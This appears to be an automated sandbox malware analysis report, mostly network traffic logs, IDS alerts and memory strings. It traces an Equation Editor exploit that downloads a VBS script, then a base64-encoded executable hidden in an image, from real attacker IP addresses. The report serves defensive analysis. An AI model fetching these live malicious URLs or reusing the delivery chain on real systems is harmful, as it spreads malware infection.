                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163

                  Networking

                  barindex
                  Source: TrafficSnort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 91.92.254.29:80 -> 192.168.2.22:49162
                  Source: TrafficSnort IDS: 2047750 ET TROJAN Base64 Encoded MZ In Image 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: TrafficSnort IDS: 2018856 ET TROJAN Windows executable base64 encoded 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: TrafficSnort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: TrafficSnort IDS: 2020425 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 3 M1 192.3.216.148:80 -> 192.168.2.22:49164
                  Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 91.92.254.29 80Jump to behavior
                  Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.33b9a80.1.raw.unpack, type: UNPACKEDPE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036205E6 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_036205E6
                  Source: global trafficHTTP traffic detected: GET /imge/new-image_v.jpg HTTP/1.1Host: 91.92.254.194Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /base64.txt HTTP/1.1Host: 192.3.216.148Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 91.92.254.29 91.92.254.29
                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                  Source: Joe Sandbox ViewASN Name: THEZONEBG THEZONEBG
                  Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Joe Sandbox ViewASN Name: THEZONEBG THEZONEBG
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDNS query: name: ip-api.com
                  Source: global trafficHTTP traffic detected: GET /datingloverstartingAgain.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.216.148Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Users_API/BrainiacMAX/file_njk01aso.gqz.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 91.92.254.29
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.148
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.148
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.148
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.148
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.29
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.29
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.29
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.216.148
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.29
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.92.254.194
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036205E6 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_036205E6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: text/vbscriptContent-Encoding: gzipLast-Modified: Thu, 04 Jul 2024 18:10:08 GMTAccept-Ranges: bytesETag: "0402a673dceda1:0"Vary: Accept-EncodingServer: Microsoft-IIS/10.0Date: Fri, 05 Jul 2024 04:23:53 GMTContent-Length: 705Data Raw: 1f 8b 08 00 00 00 00 00 04 00 dc 96 4d 8f d2 60 10 c7 e7 6c e2 77 20 1c 36 9a 28 8b 44 0f 98 78 60 2b 76 d9 ad 85 15 9a 1a 2e 06 5a 16 4a 79 a7 ac a4 1f 5e fd cd d0 9a 4d 3c 78 6f 9e f4 79 9b 99 ff cc 7f 9e b7 fe fe f5 59 12 59 4b 4d f6 12 48 44 7d e0 5b d2 1f ca 23 fd a9 4c 68 53 99 4b cc bc 2b 0e 65 45 bb 94 9c da 93 07 39 a1 93 cb 37 b9 47 63 06 d6 ad 1c 99 39 a1 3d 34 3b 45 8b 4c ba 91 05 36 1b be 00 49 84 f5 91 de 4c 06 e2 4b 07 0c 1f bb 00 69 8c 8f 88 76 8b 56 8a 65 8e c7 14 db 58 76 12 a2 13 22 db 31 9f d0 f3 89 20 a4 ef 4a 06 5e 02 fa 1b b8 a8 cc c5 b3 f2 f1 cd ef 51 6e f0 74 44 b2 66 7c 06 db 63 e6 01 bd 05 0c 73 64 5b 62 0d 18 ef 41 72 f1 32 86 83 c7 cc 98 91 6b 48 aa bb a6 f7 88 77 9f 91 63 0c 3c ca 80 08 27 e6 27 22 13 3e ad c7 4c 02 52 8e fd 1c af 29 1e 1c fc 86 48 7c e9 a3 17 a2 7f 0f ef a9 c5 1e 80 e9 60 71 42 a2 31 9c d1 1b cb 4b 79 41 16 67 c8 ab b3 3e 35 f9 c4 e7 10 fb 8c d8 33 ea 3e 36 4b da 88 d1 2b a9 cb 57 22 fb 4e ed 49 4b 1a c6 ff 20 4f 56 5f 66 6f 65 44 19 a0 f9 da 32 54 95 cc 34 c8 c4 0e 54 cd 51 9d f9 2e 2c eb b6 9f eb 60 64 94 9d 7c 94 6b 4a 5b de a1 dd b6 fc b4 e4 83 bc b7 b6 8d 24 20 32 cd d4 51 7e 10 d9 40 7a cc dd 30 9e 98 87 84 36 22 87 1d 32 79 4d 76 12 e2 9b a1 b9 81 69 2a 4d 50 27 58 6e 41 53 f6 39 6d c6 4e cc 8a 28 be 20 5d 19 7e b5 b2 3e b4 9c c7 c6 aa 47 f4 d5 39 6b ca 2d b3 53 76 02 ff 72 f2 5a ac 73 93 76 04 8a f2 56 d6 b5 a2 54 e5 de bc 30 ad ce 2a 1e 6c 0d 76 d8 6f ec fc 8d f8 f4 5c 3e 5f bb f2 1d 5f c3 6f 40 0e 1c f3 91 70 73 a6 e6 c5 05 77 85 47 f5 3f 25 9a 1d 11 2a d3 3e 6c 3c 32 e2 63 33 05 53 cf 7d 87 f1 99 0c 68 84 2a 73 b1 39 e0 3b 04 b9 43 dd 63 0f 6c f1 b0 a0 1f 63 e7 5b 36 9e d0 dd db 0a 79 58 e4 c8 03 10 cf c8 f5 f6 f1 f0 b6 c1 da 47 6f 44 14 9e dc d9 8d 74 59 ef 15 78 a1 ed 2b 17 bf 61 f1 f6 95 dc ca 37 b0 2a dc fe ff 06 86 70 8e 90 27 70 c9 ec 1c eb 69 5d 51 ca 57 af cc 4d 55 72 d2 a0 3d 15 6f 9f ee f4 9f c5 3b 56 f2 ae c9 5b 3c 6c e1 bb b6 3b 23 36 4d 2d 35 b9 aa d4 dd 75 f5 97 d9 e5 dd 6d 5a 3d 22 1b a7 e2 ed ad f6 b9 f0 99 cf f0 a3 77 df dc f8 76 9f fd 77 74 8b b5 d7 97 ba ba ff c7 ff e6 e0 cf 00 27 e4 0c f7 aa 0d 00 00 Data Ascii: M`lw 6(Dx`+v.ZJy^M<xoyYYKMHD}[#LhSK+eE97Gc9=4;EL6ILKivVeXv"1 J^QntDf|csd[bAr2kHwc<''">LR)H|`qB1KyAg>53>6K+W"NIK OV_foeD2T4TQ.,`d|kJ[$ 2Q~@z06"2yMvi*MP'XnAS9mN( ]~>G9k-SvrZsvVT0*lvo\>__o@pswG?%*>l<2c3S}h*s9;Cclc[6yXGoDtYx+
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\datingloverstartingAgain[1].vbsJump to behavior
                  Source: global trafficHTTP traffic detected: GET /datingloverstartingAgain.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.216.148Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Users_API/BrainiacMAX/file_njk01aso.gqz.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 91.92.254.29
                  Source: global trafficHTTP traffic detected: GET /imge/new-image_v.jpg HTTP/1.1Host: 91.92.254.194Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /base64.txt HTTP/1.1Host: 192.3.216.148Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: ip-api.com
                  Source: powershell.exe, 00000006.00000002.475615054.000000000623A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.475615054.00000000061A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.216.148
                  Source: powershell.exe, 00000006.00000002.475615054.000000000623A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.475615054.00000000061A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.216.148/base64.txt
                  Source: powershell.exe, 00000006.00000002.475615054.000000000623A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.216.148/base6L
                  Source: EQNEDT32.EXE, 00000002.00000002.463300087.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.216.148/datingloverstartingAgain.vbs
                  Source: EQNEDT32.EXE, 00000002.00000002.463516205.0000000003620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.216.148/datingloverstartingAgain.vbsj
                  Source: powershell.exe, 00000006.00000002.475615054.000000000623A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.2168
                  Source: powershell.exe, 00000006.00000002.473734424.0000000002389000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.254.194
                  Source: powershell.exe, 00000006.00000002.473734424.0000000002389000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.254.194/imge/new-image_v.jpg
                  Source: powershell.exe, 00000006.00000002.475358209.0000000004EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.254.194/imge/new-image_v.jpgEnN;
                  Source: wscript.exe, 00000005.00000002.476979913.0000000000657000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.476718429.000000000044C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.476838372.000000000048A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.476732830.0000000000446000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.476749983.000000000044D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.476923222.0000000000447000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.476573009.000000000048A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.476948649.000000000048A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.476926894.0000000000450000.00000004.00000020.00020000.00000000.sdmp, datingloverstartingAgain.vbs.2.dr, datingloverstartingAgain[1].vbs.2.drString found in binary or memory: http://91.92.254.29/Users_API/BrainiacMAX/file_njk01aso.gqz.txt
                  Source: wscript.exe, 00000005.00000003.476573009.0000000000475000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.476854751.0000000000478000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.476757799.0000000000477000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.476738936.0000000000475000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.476938358.0000000000478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.254.29/Users_API/BrainiacMAX/file_njk01aso.gqz.txtVO
                  Source: AddInProcess32.exe, 00000008.00000002.619828282.000000000241C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.619828282.0000000002400000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.619828282.0000000002361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                  Source: powershell.exe, 00000006.00000002.473828198.0000000003419000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.473828198.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.619369969.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.619828282.0000000002400000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.619828282.0000000002361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                  Source: powershell.exe, 00000006.00000002.473828198.0000000003279000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000006.00000002.473734424.0000000002251000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.619828282.0000000002400000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.619828282.0000000002361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000006.00000002.473828198.0000000003419000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.473828198.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.619369969.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: powershell.exe, 00000006.00000002.473828198.0000000003279000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000006.00000002.473828198.0000000003279000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000006.00000002.473828198.0000000003279000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000006.00000002.473828198.0000000003279000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

